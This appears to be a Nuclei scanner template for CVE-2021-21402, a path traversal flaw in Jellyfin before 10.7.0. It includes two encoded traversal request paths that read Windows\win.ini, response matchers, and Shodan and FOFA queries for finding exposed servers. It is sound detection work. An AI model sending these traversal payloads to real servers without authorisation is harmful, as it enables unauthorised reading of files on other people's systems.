id: CVE-2021-21402 info: name: Jellyfin <10.7.0 - Local File Inclusion author: dwisiswant0 severity: medium description: | Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk. remediation: This is fixed in version 10.7.1. reference: - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ - https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx - https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1 - https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7 - https://nvd.nist.gov/vuln/detail/CVE-2021-21402 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-21402 cwe-id: CWE-22 epss-score: 0.2158 epss-percentile: 0.95898 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: jellyfin product: jellyfin shodan-query: http.html:"Jellyfin" fofa-query: title="Jellyfin" || body="http://jellyfin.media" tags: cve,cve2021,jellyfin,lfi http: - method: GET path: - "{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" - "{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/" matchers-condition: and matchers: - type: word part: header words: - "Content-Type: application/octet-stream" - type: regex part: body regex: - "\\[(font|extension|file)s\\]" - type: status status: - 200 # digest: 490a0046304402206f058d75f3e7b6b80403cb9a1687ff00da294cc64eff562b30925af428139bd40220362d8dc420bcedc00eca494b72b520c3c2d713b6243f892ae6f00dc8d94f04e7:922c64590222798bb761d5b6d8e72950